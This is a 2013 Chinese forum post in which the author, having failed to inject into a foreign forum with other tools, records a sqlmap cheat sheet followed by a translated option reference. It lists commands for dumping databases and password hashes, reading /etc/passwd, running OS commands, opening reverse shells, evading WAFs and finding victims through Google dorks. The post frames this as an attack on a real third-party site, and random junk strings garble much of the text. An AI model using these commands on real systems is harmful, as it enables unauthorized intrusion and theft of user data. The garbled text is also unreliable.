今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、% w+ l7 U4 M- k8 S; H0 K# x
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
) C4 b, C3 k" M# x7 I; {sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名% i; ^1 j. o: y
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段% `2 k- ~7 K- J
" o; c8 e5 v1 q
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v8 ?3 J1 r# S7 D: K/ @" y' M6 B
0 #获取字段内容
5 S. F8 m$ @6 j3 f1 f % Q7 q6 g; B; w8 v
******************信息获取******************5 ^% d) P" L6 y& d! [) y" Y' e
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型2 I X* ] m5 C2 p, X( h' y
sqlmap -u “http://url/news?id=1″ –users #列数据库用户
& r4 w0 m x- v b' t2 A0 [sqlmap -u “http://url/news?id=1″ –dbs#列数据库
( j; w Y' D/ h9 T; H' E, O1 j Xsqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
: v" K+ o0 x: q9 \5 |9 x ysqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码: r9 {% p. l$ V; L' u' J1 z
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
' N, Y5 z, h( H$ j) @–start 1 –stop 20 #列出指定字段,列出20 条
- I& m% P1 p* L% g2 Q3 l6 Wsqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
$ b H2 _2 Z B: a( l& q# f- dsqlmap -u “http://url/news?id=1″ –privileges #查看权限. K2 G& x4 V7 G4 {7 q4 o! K" v: r
sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色! w8 h/ }) r+ o4 Q: Z
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)0 E, r5 K; s% Z1 O
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表1 u9 n( A. D% _% |7 Q
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录5 t) i, T9 v T; ~
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
$ C$ ~9 _% N$ b8 ]& `/ Ysqlmap -u “http://url/news?id=1″-b #获取banner信息; u) v8 `, s) B& j* Y( m+ z4 ?
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入& r7 L8 ^) u; Z) B" M- [7 b
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
/ u2 Q" a5 F" \: s. N3 esqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
! k7 h! v# F: A& psqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词, @& b/ `: O/ L& h
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
3 t0 f+ b7 m. Tsqlmap -u “http://url/news?id=1″ –file /etc/passwd
: S' h( c9 k. k% }9 @2 U ~sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
5 d, _7 m! W) s6 D; Ssqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
2 H4 D8 F( t2 Vsqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
# {6 y* F0 ]6 t$ f1 ssqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度! @5 u" Q# | e/ f$ Y
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
~- H" q" L$ z6 b& j***********高级用法*************
# l$ X0 K1 z5 z L. K-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入; c7 d( t) _7 b( A
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
* g. u9 x1 C, y, |/ {3 ]–technique 测试指定注入类型\使用的技术
" f: p9 Q9 I* S3 p& Y4 ?4 F' o$ T不加参数默认测试所有注入技术( O1 p0 S" t2 e8 m' f: |- m9 W
• B: 基于布尔的SQL 盲注4 q1 Y; m: B# g2 }: q7 N
• E: 基于显错sql 注入
9 z% ?3 T* L) H, m• U: 基于UNION 注入
' e1 X' \1 O7 i! |: {/ T• S: 叠层sql 注入
6 u7 ~, V$ p; x% e. T8 E& a• T: 基于时间盲注
' G D- x+ _- [# B4 A8 v, g( R- B4 W–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()$ H, s" J6 X& @% v8 P
–tamper 插件所在目录4 M) f5 F1 R9 D; [+ B5 Z
\sqlmap-dev\tamper& K; J& Q/ [5 M
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能! E6 }+ M, i! e k0 p# t4 o8 G
level 执行测试等级 攻击实例:2 V# o) [' T, r, k2 A
Sqlmap -u “http://url/news?id=1&Submit=Submit”
" U2 B5 E5 V; J0 ]3 l0 J( {" P M2 n–cookie=”PHPSESSID=41aa833e6d0d: R2 i4 s; H- A# j5 ?- g
28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user' t. B4 T- d) @6 I; X: o& P
–password
0 r& T" D, S% T参考文档:http://sqlmap.sourceforge.net/doc/README.html0 f6 [* I, E+ E3 w4 m# z
***********安装最新版本*************. v8 l0 E% J/ e1 _. N* r
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版7 S: s( E( n3 C7 A
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
- W" d, Y( _& `3 [' {9 A安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件2 g0 V3 G" M1 J1 T8 V Z8 r
sudo vim /home/当前用户/.bashrc2 `; y5 [" A+ c
#任意位置加上:2 d5 v2 `# z, ] G, c
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
5 j$ C0 Q. S. ^7 Q$ w$ r如果想对所有用户有效 可设置全局 编辑下面的文件
. t- l9 P' D0 w( T. Zvim /etc/profile3 b) j' } i# y
同样加上:
9 u1 `7 B+ N! I2 ]- H6 ~& Halias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效$ S5 V, s6 C- {$ y* |% c, E
******************windows 7 (x64) sqlmap install (SVN)************7 }0 f' g: l+ o9 }4 p& E
http://www.python.org/getit/ 安装python
5 F5 C5 K. D, t0 l' N8 ahttp://www.sliksvn.com/en/download 安装windows svn client
, W9 ?6 m1 Z* `% S. P( Gsvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev- M5 \8 c, L4 n
安装sqlmap: N* p7 Q; j2 C
*修改环境变量
: U( |8 h# T+ ?: H. I–version 显示程序的版本号并退出5 V2 o! V% t5 A6 S/ b
-h, –help 显示此帮助消息并退出
0 S+ P4 n9 u3 d-v VERBOSE 详细级别:0-6(默认为1)3 f7 @6 V+ B6 n- B) b' i& L: ]9 x3 N
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。% k2 p% t- |: ?
-d DIRECT 直接连接到数据库。
/ o. ^( d X3 o! e8 f-u URL, –url=URL 目标URL。
8 i; g% i( d6 B- ]/ V6 a# G-l LIST 从Burp 或WebScarab 代理的日志中解析目标。6 y9 I" P" F( c- U; g
-r REQUESTFILE 从一个文件中载入HTTP 请求。
2 y& ^: o; h# J# j% r% C u-g GOOGLEDORK 处理Google dork 的结果作为目标URL。* F3 s8 S8 T$ x
-c CONFIGFILE 从INI 配置文件中加载选项。) y1 I: K$ M3 D* t1 ~
Request(请求)::$ J0 i- Z# X2 v* |
这些选项可以用来指定如何连接到目标URL。5 d; c ~% B7 z' p+ ]
–data=DATA 通过POST 发送的数据字符串
/ i: n7 ]5 s! S P7 b" c–cookie=COOKIE HTTP Cookie 头
* P0 W. e* S* k+ }. B4 e–cookie-urlencode URL 编码生成的cookie 注入; \* Q( j3 o" y7 K3 v* o8 m
–drop-set-cookie 忽略响应的Set –Cookie 头信息/ ]8 ?& @* J# e3 |
6 j) J1 }. v. D& W' M# n–user-agent=AGENT 指定 HTTP User –Agent 头
: P; U% ~- n8 z* Q' P4 c- k–random-agent 使用随机选定的HTTP User –Agent 头
% e* `/ \" d: P( b7 |–referer=REFERER 指定 HTTP Referer 头
" \4 B# h& ^. y- t+ C, l$ {0 c–headers=HEADERS 换行分开,加入其他的HTTP 头2 U* M$ h& G; z$ o- X) c
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
" D7 d( p7 o' k) H! D, M–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)% b4 _2 J; O, I: j; x4 b2 a" `
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)" Y: W- g; i( d- b7 v( q
–proxy=PROXY 使用HTTP 代理连接到目标URL
" T' R( R* K5 T6 |8 Z0 Z+ G–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)0 L; p4 J6 @! p0 z1 x
–ignore-proxy 忽略系统默认的HTTP 代理0 e( l7 H4 H+ U3 a7 g
–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
% @! p( k! |4 M$ _–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
' ^4 H& [9 f( Y! o7 {6 f: a, z- m–retries=RETRIES 连接超时后重新连接的时间(默认3)# a% w1 D; K3 _2 I( [( l3 c* \
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
( R6 v9 a, R {- _7 Q–safe-url=SAFURL 在测试过程中经常访问的url 地址
5 `" j: y* t3 ` U–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
: n" y# x% s/ s! C: TOptimization(优化): 这些选项可用于优化SqlMap 的性能。1 l- N9 t- O" t- P* l
-o 开启所有优化开关
9 ^( c. L2 I- F3 L6 b–predict-output 预测常见的查询输出( T6 `, y6 d# d. U' D3 i* i" \1 R
–keep-alive 使用持久的HTTP(S)连接
- I% W( J* R, n8 _. N–null-connection 从没有实际的HTTP 响应体中检索页面长度
1 j7 T1 N, L- J6 b0 [–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
+ b; y0 K) d! v( D7 i. k5 y1 RInjection(注入):
' b, t) k" l! m( i6 S这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
1 M5 p, a2 B% y: x, T2 N, [-p TESTPARAMETER 可测试的参数(S)/ f. f7 c' \2 l9 s
–dbms=DBMS 强制后端的DBMS 为此值. _5 ?) ?# l7 d+ D9 Z7 P
–os=OS 强制后端的DBMS 操作系统为这个值7 w" o8 R' n6 A0 U8 Y( C$ X
–prefix=PREFIX 注入payload 字符串前缀
* l. {* H- r/ n. D–suffix=SUFFIX 注入 payload 字符串后缀# a {. s6 K5 s! q5 U' o: e0 R+ w
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
3 }" h% O# X: Y! m1 q& NDetection(检测):) K7 J) L* n( I2 Y
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。& {4 k4 c4 T' m3 U+ X. n5 T
–level=LEVEL 执行测试的等级(1-5,默认为1)
# N3 O6 ~/ G8 `1 k" ~: ^, l5 ]–risk=RISK 执行测试的风险(0-3,默认为1)
, A* n# V% M" p+ e8 @–string=STRING 查询时有效时在页面匹配字符串
% Y7 h7 y# s) U8 Q7 D–regexp=REGEXP 查询时有效时在页面匹配正则表达式
( a, G& g" ?6 @; i6 @/ m% T9 |–text-only 仅基于在文本内容比较网页; @ u1 B( `! ?' V/ k9 ^' {
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。0 _' G% f8 @6 K! a7 W+ s2 V
–technique=TECH SQL 注入技术测试(默认BEUST)
* i. Q6 E3 p1 N& C! }" P+ Z' j–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)2 `& y; s. X1 N8 I$ x
–union-cols=UCOLS 定列范围用于测试UNION 查询注入- G( c9 H i! A$ v5 N% G2 N" u
–union-char=UCHAR 用于暴力猜解列数的字符
& c5 Q/ Q; b) o) sFingerprint(指纹):% p7 ]& l1 ]! N& G# s' m
-f, –fingerprint 执行检查广泛的DBMS 版本指纹! J! [5 g6 R3 u9 F' E. v5 Y
Enumeration(枚举):/ c p6 O, U( z1 L. I$ `, X
4 e! c% G: P. V% s c这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
! C7 X' V) B6 F8 j. J8 F5 Y-b, –banner 检索数据库管理系统的标识( P1 I# i+ L' c8 Z b
–current-user 检索数据库管理系统当前用户
8 I! C. {' T+ \–current-db 检索数据库管理系统当前数据库1 B, a: R) L3 p4 M( D+ h& c6 J6 D
–is-dba 检测DBMS 当前用户是否DBA5 a1 x2 W6 D" N8 M! O2 w
–users 枚举数据库管理系统用户+ W& [, t6 T" x ^" c
–passwords 枚举数据库管理系统用户密码哈希& D1 ~1 i- o; _+ g
–privileges 枚举数据库管理系统用户的权限, t3 ~# B. b4 V' e" S" i* l
–roles 枚举数据库管理系统用户的角色
# Q+ j& d4 x. _5 K4 l–dbs 枚举数据库管理系统数据库
- {0 j# s2 ^* S% j* i+ Q8 K–tables 枚举的DBMS 数据库中的表
; Z; X) E: x2 v G* p+ d–columns 枚举DBMS 数据库表列
1 `4 `$ V5 d3 ?1 |& q–dump 转储数据库管理系统的数据库中的表项* V& V0 _2 ]2 ]
–dump-all 转储所有的DBMS 数据库表中的条目1 G" m; w) ] ?( {. ]+ S0 T
–search 搜索列(S),表(S)和/或数据库名称(S)2 F# c6 r0 a' b5 u; \. O: I
-D DB 要进行枚举的数据库名
6 C% y& Y: R9 J1 @) _-T TBL 要进行枚举的数据库表# p& B5 u- O0 t
-C COL 要进行枚举的数据库列, u8 ^4 T; c1 o2 y
-U USER 用来进行枚举的数据库用户
) T" `, @' D+ z- p: o6 S. K–exclude-sysdbs 枚举表时排除系统数据库
" \, _1 L( [/ h' x/ T! ]–start=LIMITSTART 第一个查询输出进入检索# k! T: a9 U) J$ E& h+ q$ L
–stop=LIMITSTOP 最后查询的输出进入检索
* \' G/ n1 b% u–first=FIRSTCHAR 第一个查询输出字的字符检索, H1 l' W1 S' z4 ~* d
–last=LASTCHAR 最后查询的输出字字符检索# ^. k/ D ]# }" z: ]5 y
–sql-query=QUERY 要执行的SQL 语句
' r0 G0 P% X8 Y# t- l9 D–sql-shell 提示交互式SQL 的shell: L9 N# r7 ]% w! E
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
. C) r% b2 A+ n8 G6 X' G- E–common-tables 检查存在共同表
0 {( }' p, X3 k3 F& \–common-columns 检查存在共同列
* B9 O* w4 w) A" E& N* W9 H* BUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
i. b) V7 B- e–udf-inject 注入用户自定义函数
" m9 m/ R" L/ c1 |; K* u–shared-lib=SHLIB 共享库的本地路径
* ]$ W: |7 W( c( z0 B; dFile system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
- @! m2 m. x* F4 V8 I–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
' Q# E. R/ J5 Y. W/ O–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
" e5 p5 F# {% _–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
z) P/ Y. w/ a# D) J3 TOperating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。: N d$ |# [" p3 }8 z/ x) w7 j6 O
–os-cmd=OSCMD 执行操作系统命令( R' s7 A; D( p% Y0 O9 D, _
–os-shell 交互式的操作系统的shell l6 a2 | t, n. {5 N! l
–os-pwn 获取一个OOB shell,meterpreter 或VNC# d! U% v5 B( j% _8 s
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC/ D# V2 K3 i- x+ C9 ~# w P% h! m
–os-bof 存储过程缓冲区溢出利用
. J0 {+ ?7 V0 r–priv-esc 数据库进程用户权限提升
; s! T, ]( b! G* L5 n$ q e–msf-path=MSFPATH Metasploit Framework 本地的安装路径
' Z9 W* ]( ~1 \6 Y! l" }: H–tmp-path=TMPPATH 远程临时文件目录的绝对路径1 }" r& k( v" \, |' ]/ H# `
# H9 `( Y! ~. u- W' A1 S0 S$ e' c
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
7 a4 Z! u" H# _/ f9 f7 }) ]) e8 B–reg-read 读一个Windows 注册表项值4 M; H- ]7 n( T/ ]; n
–reg-add 写一个Windows 注册表项值数据
3 l8 l; Z% `/ _3 H–reg-del 删除Windows 注册表键值! p$ G3 m: i- Z$ Q) I
–reg-key=REGKEY Windows 注册表键
. J. y8 O- C( p–reg-value=REGVAL Windows 注册表项值$ Q+ B( |4 n9 \% y7 t( a
–reg-data=REGDATA Windows 注册表键值数据4 t; d" E1 e. I3 o
–reg-type=REGTYPE Windows 注册表项值类型
# H3 {6 ?, o+ rGeneral(一般): 这些选项可以用来设置一些一般的工作参数。
! W/ |3 s G& O/ y; J4 }-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中
1 Q, o/ \4 O: ]! i. \-s SESSIONFILE 保存和恢复检索会话文件的所有数据
, s% ~9 B. ~8 g4 v! {, X–flush-session 刷新当前目标的会话文件3 \2 I! q5 }& u6 Q/ `$ [
–fresh-queries 忽略在会话文件中存储的查询结果
$ i) N+ l1 R3 C6 h* r* S* f–eta 显示每个输出的预计到达时间
/ a, x5 i" J% T9 }–update 更新SqlMap
& S# ?/ D- j6 I9 \( w7 k- y% K7 r% d1 f–save file 保存选项到INI 配置文件
; y, F+ ^4 [: C5 R–batch 从不询问用户输入,使用所有默认配置。
- C& o" w6 b2 |" ~! b3 h7 ` PMiscellaneous(杂项):
' K) X" H$ G3 _) l. [6 Y. j! B* Q–beep 发现SQL 注入时提醒
3 Q" s9 E3 s1 R/ c% i7 T& f–check-payload IDS 对注入payloads 的检测测试
0 o6 ?6 l; ?- Y. a–cleanup SqlMap 具体的UDF 和表清理DBMS' Z6 U: f0 f) e; o, X
–forms 对目标URL 的解析和测试形式
- w6 m# c6 X& r: n$ M, L–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
5 a4 e& r/ r6 U5 d2 z( n–page-rank Google dork 结果显示网页排名(PR)
, t7 t2 z1 y9 g6 t! U( [, J+ H–parse-errors 从响应页面解析数据库管理系统的错误消息. C- s" f* V9 p; d. C* p. y/ @
–replicate 复制转储的数据到一个sqlite3 数据库7 g; p; M4 p2 P1 n) ~
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址; r2 ?6 J6 T0 G9 g4 t; E
–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对